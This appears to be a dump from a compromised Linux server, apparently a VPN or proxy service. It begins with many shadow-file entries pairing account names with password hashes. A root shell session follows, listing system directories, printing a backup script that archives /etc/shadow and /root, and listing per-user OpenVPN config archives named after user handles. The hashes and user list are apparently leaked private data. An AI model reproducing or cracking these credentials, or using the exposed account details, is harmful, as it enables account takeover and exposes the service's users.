niSxFcVo6S:itxdORWkQMuLU:14936:0:99999:7::14966:
Uxx9MvILLz:itonzxA2QqSCo:14937:0:99999:7::14967:
klYUlzI7cK:it5P8KkyhBUx.:14938:0:99999:7::14968:
6m9Y1QaKr3:itdviqsn/UOgM:14938:0:99999:7::14968:
lVXZHCarqJ:ittqGaCR7CVzY:14938:0:99999:7::14968:
4GWL9WXzxF:itmpwb3peAPso:14938:0:99999:7::14968:
JxaTdAV8Rw:itJeetI8t0THk:14938:0:99999:7::14969:
8P7jKJ2Nlh:itcCo7MW2z5c2:14939:0:99999:7::14969:
vkE7Afv1aW:itxj1CCnY0KVU:14939:0:99999:7::14969:
2Er5XcDGWA:itVQQjFaoLsVs:14939:0:99999:7::14969:
qwBUev5nEp:ityFIjDrBhcMY:14939:0:99999:7::14970:
muIspwxptl:itGdEXkF3KasY:14939:0:99999:7::14970:
e5yhvJdeTw:itcISq4222ADM:14940:0:99999:7::14970:
XUxzr4xMlT:itxh06MdAbfAc:14940:0:99999:7::15030:
va20H8Ol9R:itGRrgpip6fho:14940:0:99999:7::14970:
qsAbm8ZMyg:it3Ob3nUJuqU.:14940:0:99999:7::14970:
9An1Ctk2Qa:it2SEn0lMti9k:14940:0:99999:7::14970:
Ey5cDS72xR:it6G5reVhlop2:14940:0:99999:7::14970:
uCUqoIdGPa:itZuCKn5tD7XE:14941:0:99999:7::14971:
N6fG120epq:itVuvFFxaDk8E:14942:0:99999:7::14972:
gV0gXSFPQ8:itwtoSkg28amA:14942:0:99999:7::14972:
FvxPhU3XUz:itFgdFZMSk67A:14942:0:99999:7::14972:
iYoWJEuIeo:itPSTarGMLfTY:14942:0:99999:7::14972:
ybLYgoCPNG:itjTsMk3pE7e2:14944:0:99999:7::14974:
Z6pSiUldwy:ityDkEl8UvQc6:14944:0:99999:7::14974:
TkRcTTkRSF:itlk29O.cDvaE:14944:0:99999:7::14974:
wHgs7nrMld:it9XlfjywiXy6:14944:0:99999:7::14974:
nUYfzYpR4G:itvgu.6SeYDs6:14945:0:99999:7::14975:
8tEhjjRlAC:ithIZGhH1YWGs:14945:0:99999:7::14975:
JpChWSSU54:itmC7n8H/IzOI:14946:0:99999:7::14976:
EnwaHzdt35:itW5rIFvNIESI:14947:0:99999:7::14977:
juTd17x1Nc:itdIXw1efcit2:14947:0:99999:7::14977:
TOTQ91BEwS:itETt4OL8daUg:14947:0:99999:7::14977:
6UTA6cTgc2:it/jPTOoUX7RU:14947:0:99999:7::14977:
93EP0GUfGC:itjZCu2VpVTto:14947:0:99999:7::14977:
N66NJ15WGg:itvfxHbWSpAGs:14948:0:99999:7::14978:
yXmWg290xo:itd6FNm6EstQo:14948:0:99999:7::14978:
rcc6AHS1Jg:itaW/avCpeX7I:14949:0:99999:7::14979:
zXMmeDGbqP:itbKfASBg5kjQ:14949:0:99999:7::14979:
7tdzW87F9R:it59iCPlIQ2nI:14949:0:99999:7::14979:
dpswkJLMwG:itq8CorTAKvbQ:14949:0:99999:7::14979:
azsvod1Qyg:itVYBbnLQOXvs:14950:0:99999:7::14980:
72ju0LjHvy:it1M93rvoYWOs:14950:0:99999:7::14980:
73yatKHdOE:itgExui2oxI6k:14951:0:99999:7::14985:
UWC2JU92e0:itqqXARCLiWbI:14951:0:99999:7::14981:
i1BmroAIeM:itLVHBV2drUzk:14951:0:99999:7::14981:
8sAlXL7Ibr:it64Q2stSnBHA:14953:0:99999:7::14983:
kk2M3z5gcp:itBHe6tqX.3XA:14953:0:99999:7::14983:
9cK5xC48nV:itl87NEjGEK2w:14954:0:99999:7::14984:
SBAetxCLTy:itnnHODH7U6ss:14954:0:99999:7::14984:
8iZ9BfefaC:itqzc7PIHyg9U:14955:0:99999:7::14985:
D73JHDlBCn:it5HRy53l43Y6:14955:0:99999:7::14985:
OkpQWghNPU:it./ezuDx/YQE:14956:0:99999:7::14986:
gUADWitYGX:it/KOoOhBksMA:14956:0:99999:7::14986:
DaGvQaxltT:itLrqA5G31PN2:14956:0:99999:7::14986:
pBw5St2oIK:it553jDzNAPfc:14956:0:99999:7::14986:
f37WEzjkBK:itwnTkJDchqME:14956:0:99999:7::14986:
23101kMksS:itGlGqE/KXM32:14956:0:99999:7::14986:
OmXdWCH5Fq:it1RlH2X7DVAM:14957:0:99999:7::14987:
6HRKiqn5AS:it1T38X6cuM6c:14957:0:99999:7::14987:
p8aQLoUmKx:itrg.SUskuxyg:14957:0:99999:7::14987:
31YimlYNtc:itpkbpgDGcZ.s:14957:0:99999:7::14987:
P6q1AGVRjm:itkyYcDlznPYE:14958:0:99999:7::14988:
lK7CY8gP5z:ithVNEA6Zp2sY:14958:0:99999:7::14988:
y5MJDV3DL9:itpXG8NQzmABo:14958:0:99999:7::14988:
qAcEd9FYMX:itVRMAu6wGMC.:14958:0:99999:7::14988:
GpEu7dTAI7:itB3YWx6ee0SY:14959:0:99999:7::14989:
MSMzq0euqr:itiISfOIxsxaE:14959:0:99999:7::14991:
inlnCLfVUo:itvhTbyWymA22:14960:0:99999:7::14990:
ollSVqKLpa:itVpMPYmRMELQ:14961:0:99999:7::14991:
s2C71Wifr9:itFk8miODAIbI:14961:0:99999:7::14991:
UxsvWRQWBq:it7xuKEJ86nZ6:14962:0:99999:7::14992:
QY6arE2Ydq:itHpW7AaspT.w:14962:0:99999:7::14992:
b5sNwDdmEK:itmvq9eooqmO6:14962:0:99999:7::14992:
pdpUuNAtXK:it0R6bx0FyZlE:14962:0:99999:7::14992:
NxsMofNyV2:itLK/56KKYaog:14962:0:99999:7::14992:
DtzoQ2Xw7q:itYVSREQMSdBw:14962:0:99999:7::14992:
tDBq7HfG3r:itzVytgnZiSAU:14963:0:99999:7::14993:
f8cDerX7wf:itFrqaj9jTUlU:14963:0:99999:7::14993:
QoTkaCA5hf:itiV6gqc74Sqw:14963:0:99999:7::14993:
Lmh9L2R8qz:itd7geSqRbFrk:14964:0:99999:7::14995:
kzgMwiKIDN:itT6bPP4kO.Rw:14965:0:99999:7::14995:
6pFUWCUnmw:itvTnr5tKE9Qw:14966:0:99999:7::14996:
Pgh2JWajwc:itoBQz08YAmFY:14966:0:99999:7::15056:
PKSb4b3iAN:itnJSnuTJIPf.:14966:0:99999:7::14997:
5DeP78tYXf:itSvfA1ftcp52:14967:0:99999:7::15327:
ZDrNQotOat:ithoGBbOmxVC6:14967:0:99999:7::14997:
rd5t8jfvnj:itgFK3/lIbbHk:14970:0:99999:7::15000:
vuqRa4K55i:itnwIbDrEdQQ.:14972:0:99999:7::14972:
itMjMX8Zgb:itvQs9lGWMpPE:14976:0:99999:7::15006:
MyxPyfxyxX:it4om/OGRqVaQ:14977:0:99999:7::15007:
BcLoH5F0R3:itS5U3vZ.ZSJE:14977:0:99999:7::15007:
9T9jRHvZ7q:it/k5IGATH0sU:14977:0:99999:7::15007:
ienW7EvZzk:it/3va3uNrm/g:14977:0:99999:7::15007:
kdo3z10kOe:it0m6oAlzDdt2:14978:0:99999:7::15008:
WX4JFyd3V4:itoQdv/BhznWg:14978:0:99999:7::15008:
PAhJp3OPbl:itctUnxxabPF.:14980:0:99999:7::15010:
cfmu8MNhEM:itiDjVMKDet5s:14981:0:99999:7::15011:
iyW122H0oe:itERsdw.iVxl2:14981:0:99999:7::15011:
3YePbBy2tp:it0lHPhi5gXbU:14981:0:99999:7::15011:

# cd / && ls -la
total 176
drwxr-xr-x  20 root root  4096 Jan  6 13:13 .
drwxr-xr-x  20 root root  4096 Jan  6 13:13 ..
-rw-------   1 root root  1024 May  8  2010 .rnd
lrwxrwxrwx   1 root root    39 Nov 25 20:52 aquota.group -> /proc/vz/vzaquota/0000003f/aquota.group
lrwxrwxrwx   1 root root    38 Nov 25 20:52 aquota.user -> /proc/vz/vzaquota/0000003f/aquota.user
-rwxr-xr-x   1 root root   172 Aug 21 21:34 backup.sh
drwxr-xr-x   2 root root  4096 Nov 15 02:26 bin
drwxr-xr-x   2 root root  4096 Feb  2  2010 boot
drwxr-xr-x   7 root root  4096 Jan  6 13:13 dev
-rw-r--r--   1 root root  4416 Sep 13 14:07 e107_files
drwxr-xr-x  70 root root  4096 Jan  7 19:07 etc
drwxr-xr-x   3 root root  4096 May  9  2010 home
-rw-------   1 root root     0 Nov  2 10:30 ipp.txt
drwxr-xr-x  10 root root  4096 May 11  2010 lib
lrwxrwxrwx   1 root root     4 Nov 25 20:52 lib64 -> /lib
drwxr-xr-x   2 root root  4096 Feb  2  2010 media
drwxr-xr-x   2 root root  4096 Feb  2  2010 mnt
drwxr-xr-x   2 root root  4096 Feb  2  2010 opt
dr-xr-xr-x 171 root root     0 Jan  6 13:13 proc
drwxr-xr-x   5 root root  4096 Jan  4 20:32 root
drwxr-xr-x   2 root root  4096 Feb  2  2010 sbin
drwxr-xr-x   2 root root  4096 Feb  2  2010 selinux
drwxr-xr-x   2 root root  4096 Feb  2  2010 srv
drwxr-xr-x   3 root root     0 Jan  6 13:13 sys
drwxrwxrwt   4 root root  4096 Jan  7 18:12 tmp
drwxr-xr-x  11 root root  4096 Feb  2  2010 usr
drwxr-xr-x  14 root root  4096 Feb  2  2010 var
-rwxr-xr-x   1 root root 83749 Sep  8 21:27 xgoogler

# cat backup.sh 
#!/bin/bash

name=`date | sed -e "s/ /_/g"`
name=`echo "/${name}__vpn_backup.tgz"`
tar cfvz "$name" /var/www/ /root/ /etc/openvpn/ /etc/sockd.conf /etc/passwd /etc/shadow

# cd /root && ls -la
total 92
drwxr-xr-x  5 root root  4096 Jan  4 20:32 .
drwxr-xr-x 20 root root  4096 Jan  6 13:13 ..
-rw-------  1 root root  6593 Jan  6 12:59 .bash_history
-rw-r--r--  1 root root   409 May  9  2010 .bashrc
-rw-------  1 root root   124 Jan  3 13:02 .lesshst
-rw-r--r--  1 root root   140 Nov 19  2007 .profile
-rw-------  1 root root  1024 Jan  7 05:00 .rnd
drwx------  2 root root  4096 Jun 20  2010 .ssh
-rw-------  1 root root  6863 Jan  4 20:32 .viminfo
-rw-------  1 root root  2288 Nov  7 00:39 .viminfo.tmp
-rw-------  1 root root     0 Nov  7 00:39 .viminfz.tmp
-rwxr-xr-x  1 root root   698 May  9  2010 createSSHsocks.sh
-rw-r--r--  1 root root 15716 Sep 13 14:12 e107_plugins
-rwxr-xr-x  1 root root    27 Oct 27 19:50 killsockd.sh
-rw-r--r--  1 root root  5052 Aug 28 16:06 noVPNaccess
-rw-r--r--  1 root root    53 Aug  5 00:18 sshCreateLog
drwx------  2 root root  4096 Nov  7 00:39 v90992
drwx------  2 root root  4096 Nov  7 00:39 v90992v90993

# cat killsockd.sh 
#!/bin/bash

killall sockd

# cd /var/www && ls -la
total 2388
drwxr-xr-x  3 root root 36864 Jan  4 20:32 .
drwxr-xr-x 14 root root  4096 Feb  2  2010 ..
-rw-------  1 root root  1024 Jan  4 20:17 .rnd
-rw-r--r--  1 root root  3588 Aug 10 22:04 0x00321279_OPENVPN.tgz
-rw-r--r--  1 root root  3606 Jun 12  2010 0x0032291_OPENVPN.tgz
-rw-r--r--  1 root root  3599 Oct  7 22:28 12dima1226315_OPENVPN.tgz
-rw-r--r--  1 root root  3592 Nov  4 15:41 13scarface3731276_OPENVPN.tgz
-rw-r--r--  1 root root  3577 Dec  8 12:16 21Kms24551_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Sep  2 19:15 2fast17248_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Jul 26 23:46 3lanka19070_OPENVPN.tgz
-rw-r--r--  1 root root  3574 Nov 19 23:26 Abs0lut11214_OPENVPN.tgz
-rw-r--r--  1 root root  3409 Aug 10 18:00 Accountcc19547_OPENVPN.tgz
-rw-r--r--  1 root root  3414 Nov 26 11:45 Alanka11177_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Dec 28 13:11 Alanka30566_OPENVPN.tgz
-rw-r--r--  1 root root  3428 Oct 22 07:58 AndreWeiher00723178_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Aug  3 20:35 Anducar31060_OPENVPN.tgz
-rw-r--r--  1 root root  3566 Sep  5 08:18 Anducar7753_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Aug 29 23:55 Anony15422_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Jul 14 19:31 Anonym0us9696_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Dec 15 14:19 Axonym26091_OPENVPN.tgz
-rw-r--r--  1 root root  3606 Jul  4  2010 B0rnBaby4754_OPENVPN.tgz
-rw-r--r--  1 root root  3566 Oct 31 18:25 B4c4rd124091_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Aug 11 04:20 BEKANNTMACHUNGEN15913_OPENVPN.tgz
-rw-r--r--  1 root root  3432 Jun  4  2010 Baduila3649_OPENVPN.tgz
-rw-r--r--  1 root root  3399 Jul 26 18:01 Bero1346519125_OPENVPN.tgz
-rw-r--r--  1 root root  3570 Jul 27 14:12 Bijusov1292_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Sep 28 20:34 BlaBla14724_OPENVPN.tgz
-rw-r--r--  1 root root  3574 Sep 13 02:55 Butch1229_OPENVPN.tgz
-rw-r--r--  1 root root  3617 Jul  1  2010 Butch21700_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Aug 11 21:57 Butch26236_OPENVPN.tgz
-rw-r--r--  1 root root  3434 Nov 24 17:43 Carcharias198028154_OPENVPN.tgz
-rw-r--r--  1 root root  3424 Oct 13 15:29 Carcharias19804168_OPENVPN.tgz
-rw-r--r--  1 root root  3589 Jul 17 18:07 Chaos13009_OPENVPN.tgz
-rw-r--r--  1 root root  3419 Jun 25  2010 CherryPicker28808_OPENVPN.tgz
-rw-r--r--  1 root root  3620 Jun 17  2010 Chillywilly14043_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Jul 28 20:24 Chillywilly19583_OPENVPN.tgz
-rw-r--r--  1 root root  3431 Jun  3  2010 Chiruge7152_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Nov 23 19:44 Cifer2213003_OPENVPN.tgz
-rw-r--r--  1 root root  3567 Aug 10 22:06 Cifer2223193_OPENVPN.tgz
-rw-r--r--  1 root root  3563 Sep 13 14:35 Cifer228621_OPENVPN.tgz
-rw-r--r--  1 root root  3598 Jun 15  2010 CodeBeat13144_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Jul 17 01:56 CodeBeat24591_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Oct 17 21:55 CodeBeat31195_OPENVPN.tgz
-rw-r--r--  1 root root  3624 Jun 26  2010 Crackstar133730456_OPENVPN.tgz
-rw-r--r--  1 root root  3632 Jun  1  2010 Deadcollector6982_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Jul 20 22:40 Delphinko12230_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Oct 19 01:27 Delphinko19165_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Nov 29 16:56 Delphinko9555_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Jul 20 02:45 Device27308_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Sep 22 02:10 Device31313_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Nov 18 01:50 Device999_OPENVPN.tgz
-rw-r--r--  1 root root  3597 Oct 13 04:40 DingDong18559_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Dec 27 07:41 DingDong25025_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Nov 23 02:05 DingDong32694_OPENVPN.tgz
-rw-r--r--  1 root root  3425 May 31  2010 Dominik2990_OPENVPN.tgz
-rw-r--r--  1 root root  3580 Nov  3 03:49 DrHouse30072_OPENVPN.tgz
-rw-r--r--  1 root root  3613 Jan  3 07:10 Dukeraider16313_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Oct 21 18:07 Dukeraider16393_OPENVPN.tgz
-rw-r--r--  1 root root  3629 Jul  3  2010 Elite13372193_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Nov 12 20:49 Emrano27523_OPENVPN.tgz
-rw-r--r--  1 root root  3585 Dec  8 19:36 EsseX10367_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Aug  2 21:32 FAM0US10495_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Oct 26 19:26 Fahne18697_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Oct 10 01:51 FatJoe11716_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Nov 27 12:23 FatJoe31469_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Aug 21 20:16 FavourStyle4249_OPENVPN.tgz
-rw-r--r--  1 root root  3422 Aug 29 00:05 FaxXer14831_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Oct 21 17:55 FaxXer15844_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Dec 13 17:17 FaxXer26908_OPENVPN.tgz
-rw-r--r--  1 root root  3435 Jul  6  2010 FinalX213616_OPENVPN.tgz
-rw-r--r--  1 root root  3401 Nov 27 11:11 FireFreak26704_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Oct 15 05:21 Flex121428_OPENVPN.tgz
-rw-r--r--  1 root root  3416 Nov 26 19:01 Flex1219530_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Oct 18 15:08 Floep19230_OPENVPN.tgz
-rw-r--r--  1 root root  3587 Aug 22 03:57 Floep22106_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Nov 11 01:28 Freakstyler14325_OPENVPN.tgz
-rw-r--r--  1 root root  3629 Jun 19  2010 Freakzzor30552_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Nov 14 20:32 Fruchtii4940_OPENVPN.tgz
-rw-r--r--  1 root root  3623 Jun 19  2010 G0ETHE22157_OPENVPN.tgz
-rw-r--r--  1 root root  3571 Dec 19 15:29 G4g4m3l23565_OPENVPN.tgz
-rw-r--r--  1 root root  3567 Aug 30 11:36 G4g4m3l3086_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Jul  2  2010 GinTonic30066_OPENVPN.tgz
-rw-r--r--  1 root root  3598 Dec 17 17:05 Ginal40622069_OPENVPN.tgz
-rw-r--r--  1 root root  3404 Dec 23 15:13 HGroup29522_OPENVPN.tgz
-rw-r--r--  1 root root  3414 Aug 22 00:17 HGroup3416_OPENVPN.tgz
-rw-r--r--  1 root root  3391 Jul 13 10:15 Haloneros10917_OPENVPN.tgz
-rw-r--r--  1 root root  3396 Aug 19 16:58 Haloneros4547_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Dec  6 12:38 Haloneros7849_OPENVPN.tgz
-rw-r--r--  1 root root  3629 Jun 28  2010 Hardstyler23602_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Jul 23 19:07 Headliner16576_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Oct 11 07:05 Hellraiser15486_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Dec 31 00:20 HonigMelone2260_OPENVPN.tgz
-rw-r--r--  1 root root  3402 Oct 31 03:05 HonigMelone8351_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Nov 27 01:17 Iceman3299_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Dec 19 20:35 Jaksa22983_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Jul 11 20:01 Jaksa2527_OPENVPN.tgz
-rw-r--r--  1 root root  3560 Dec 11 20:05 Jayo12320635_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Jun 30  2010 Joana24614_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Nov 26 12:12 Joana25619_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Nov  3 20:28 Jondoe28020_OPENVPN.tgz
-rw-r--r--  1 root root  3410 Aug 30 02:45 Jondoe5523_OPENVPN.tgz
-rw-r--r--  1 root root  3616 Jul  9 16:47 KaLLi17527_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Nov 18 01:45 Kamill9407_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Aug 17 13:08 Kasanova11582_OPENVPN.tgz
-rw-r--r--  1 root root  3612 Jul  9 14:55 Kasanova18022_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Nov  4 16:05 Kasanova19712_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Dec 15 14:30 Kasanova22555_OPENVPN.tgz
-rw-r--r--  1 root root  3598 Sep 17 17:54 Kasanova25732_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Oct 10 15:56 Keks1237082_OPENVPN.tgz
-rw-r--r--  1 root root  3569 Aug 10 21:52 Keks1238205_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Dec 23 16:08 Kerber0s4146_OPENVPN.tgz
-rw-r--r--  1 root root  3612 Aug  4 13:21 KeyserSoze18958_OPENVPN.tgz
-rw-r--r--  1 root root  3435 Oct 14 16:03 KillerZwerg82931120_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Aug 25 20:36 Kluless30753_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Dec 29 15:05 Kolumbus15438_OPENVPN.tgz
-rw-r--r--  1 root root  3404 Nov 15 19:14 Kucka19807504_OPENVPN.tgz
-rw-r--r--  1 root root  3625 Jun  4  2010 LAWest26683_OPENVPN.tgz
-rw-r--r--  1 root root  3615 Jul  6  2010 LAWest32033_OPENVPN.tgz
-rw-r--r--  1 root root  3567 Dec  7 12:10 LiipTon17714_OPENVPN.tgz
-rw-r--r--  1 root root  3409 Jul 29 11:58 Loader15498_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Dec 28 12:43 Loader30988_OPENVPN.tgz
-rw-r--r--  1 root root  3614 Jun  5  2010 Loptr20388_OPENVPN.tgz
-rw-r--r--  1 root root  3580 Jul 20 17:23 Loptr27683_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Aug 28 00:29 Lowne11627_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Nov 11 18:34 LuckyLuke28779_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Aug 10 22:07 M000N5312_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Nov 12 20:43 Mandy13987_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Aug  4 22:43 Mandy31362_OPENVPN.tgz
-rw-r--r--  1 root root  3607 May 12  2010 Mandy31820_OPENVPN.tgz
-rw-r--r--  1 root root  3607 Sep  2 01:46 Mantis7011486_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Aug 19 00:23 MarkusSx16847_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Sep 10 16:05 Masterlord10052_OPENVPN.tgz
-rw-r--r--  1 root root  3594 Dec  3 17:10 Maxim6745_OPENVPN.tgz
-rw-r--r--  1 root root  3421 Dec 29 15:38 McKnad15403_OPENVPN.tgz
-rw-r--r--  1 root root  3622 May 28  2010 McKnad23906_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Aug 29 18:10 McKnad2804_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Oct  3 00:19 McKnad9531_OPENVPN.tgz
-rw-r--r--  1 root root  3627 Jul 11 00:59 Morgen22283_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Aug 14 23:15 Mutti17770_OPENVPN.tgz
-rw-r--r--  1 root root  3581 Oct  5 01:40 Mutti21505_OPENVPN.tgz
-rw-r--r--  1 root root  3610 May 12  2010 Mutti8762_OPENVPN.tgz
-rw-r--r--  1 root root  3575 Nov  9 23:21 N3v107908_OPENVPN.tgz
-rw-r--r--  1 root root  3599 Jan  2 11:57 N3v108540_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Jul 30 16:17 NDTBIT12101_OPENVPN.tgz
-rw-r--r--  1 root root  3428 Oct 16 05:23 NDTBIT25949_OPENVPN.tgz
-rw-r--r--  1 root root  3413 Sep  7 20:33 NDTBIT26205_OPENVPN.tgz
-rw-r--r--  1 root root  3576 Jul 29 04:41 Nappo10976_OPENVPN.tgz
-rw-r--r--  1 root root  3401 Aug 10 13:09 Nighty5510_OPENVPN.tgz
-rw-r--r--  1 root root  3611 Jun  3  2010 Nop0x29828_OPENVPN.tgz
-rw-r--r--  1 root root  3616 May 27  2010 Oldsql26067_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Sep 23 01:42 Pasi6512495_OPENVPN.tgz
-rw-r--r--  1 root root  3632 Jul 10 00:12 PeteSniff26963_OPENVPN.tgz
-rw-r--r--  1 root root  3622 May 22  2010 Ph0nix4947_OPENVPN.tgz
-rw-r--r--  1 root root  3635 Jun 29  2010 Phantonym17925_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Oct 26 05:43 Phiriun2823_OPENVPN.tgz
-rw-r--r--  1 root root  3409 Dec 10 17:07 Pitbull6910648_OPENVPN.tgz
-rw-r--r--  1 root root  3615 Jun 25  2010 Pl0051690_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Nov 28 08:39 Poseidon10572_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Aug 16 21:45 PostMort3m12175_OPENVPN.tgz
-rw-r--r--  1 root root  3422 Sep  2 19:56 Prager28005_OPENVPN.tgz
-rw-r--r--  1 root root  3614 Jun 21  2010 Prager2997_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Aug 24 16:50 Predat0r20106_OPENVPN.tgz
-rw-r--r--  1 root root  3596 Jul 13 18:11 Predat0r9093_OPENVPN.tgz
-rw-r--r--  1 root root  3620 Jun 13  2010 Profi13618_OPENVPN.tgz
-rw-r--r--  1 root root  3623 Aug  2 01:50 Pussyrider12591_OPENVPN.tgz
-rw-r--r--  1 root root  3609 Sep  7 02:28 Pussyrider2553_OPENVPN.tgz
-rw-r--r--  1 root root  3621 Jul  5  2010 Pwhoam7437_OPENVPN.tgz
-rw-r--r--  1 root root  3414 Nov 23 23:34 QuickSilver30900_OPENVPN.tgz
-rw-r--r--  1 root root  3436 Jun  8  2010 R0MANCE30753_OPENVPN.tgz
-rw-r--r--  1 root root  3628 Jun 29  2010 Raiden19032_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Nov 21 20:34 Rambo020232438_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Oct  4 16:22 Rambo02026184_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Jul 18 16:28 Raser8912111_OPENVPN.tgz
-rw-r--r--  1 root root  3584 Oct 19 23:52 Ratte15435_OPENVPN.tgz
-rw-r--r--  1 root root  3575 Oct 20 00:50 Ratte29885_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Aug  8 14:34 Revar13568_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Sep 13 20:35 Revar186_OPENVPN.tgz
-rw-r--r--  1 root root  3415 Aug  3 00:36 Rodney29032_OPENVPN.tgz
-rw-r--r--  1 root root  3602 Sep 13 18:11 S3t4p3x311542_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Dec 14 12:26 Sa1nt856432005_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Sep 22 02:07 SaCuSkill19539_OPENVPN.tgz
-rw-r--r--  1 root root  3430 Jun  3  2010 Scanner22720_OPENVPN.tgz
-rw-r--r--  1 root root  3405 Dec 27 17:07 Senninmod9366_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Dec 11 17:13 SilverFox12282_OPENVPN.tgz
-rw-r--r--  1 root root  3574 Aug 29 20:49 SilverS14224_OPENVPN.tgz
-rw-r--r--  1 root root  3431 May 15  2010 SilverS18699_OPENVPN.tgz
-rw-r--r--  1 root root  3578 Oct  2 10:17 SilverS29996_OPENVPN.tgz
-rw-r--r--  1 root root  3590 Nov  1 15:44 SlamD7819_OPENVPN.tgz
-rw-r--r--  1 root root  3596 Nov 21 22:25 SleepyHollow30848_OPENVPN.tgz
-rw-r--r--  1 root root  3574 Aug 20 05:00 Slumski15259_OPENVPN.tgz
-rw-r--r--  1 root root  3404 Dec 11 17:30 SmileNike4939_OPENVPN.tgz
-rw-r--r--  1 root root  3628 Jun 25  2010 SonnyBlack761_OPENVPN.tgz
-rw-r--r--  1 root root  3414 Nov 18 20:30 Sparkasse19880_OPENVPN.tgz
-rw-r--r--  1 root root  3427 Jun 16  2010 Standex637_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Nov  7 23:40 Star1711657_OPENVPN.tgz
-rw-r--r--  1 root root  3407 Oct 14 20:11 Stejin14830_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Nov 29 13:23 Stejin27979_OPENVPN.tgz
-rw-r--r--  1 root root  3621 Jun  9  2010 SunDay5117_OPENVPN.tgz
-rw-r--r--  1 root root  3583 Sep 27 09:43 Swiss8114_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Jul 17 22:38 Sylcore21775_OPENVPN.tgz
-rw-r--r--  1 root root  3561 Jul 16 03:23 Sylcore27550_OPENVPN.tgz
-rw-r--r--  1 root root  3627 Jul  2  2010 Syntex31511_OPENVPN.tgz
-rw-r--r--  1 root root  3604 Nov  4 06:13 TARTAROS15648_OPENVPN.tgz
-rw-r--r--  1 root root  3411 Jul 18 13:57 Thnallgzt1355_OPENVPN.tgz
-rw-r--r--  1 root root  3613 Dec 13 06:07 Thunder052_OPENVPN.tgz
-rw-r--r--  1 root root  3403 Oct 17 17:16 Tiberius121180_OPENVPN.tgz
-rw-r--r--  1 root root  3605 Aug 20 21:22 Tiberius25495_OPENVPN.tgz
-rw-r--r--  1 root root  3420 Aug 29 17:10 Torbon5467_OPENVPN.tgz
-rw-r--r--  1 root root  3597 Oct  4 01:41 Trinx15364_OPENVPN.tgz
-rw-r--r--  1 root root  3581 Nov 22 00:54 Trinx24908_OPENVPN.tgz
-rw-r--r--  1 root root  3593 Aug 29 21:56 Trinx31242_OPENVPN.tgz
-rw-r--r--  1 root root  3582 Jul 11 18:39 Trinx9318_OPENVPN.tgz
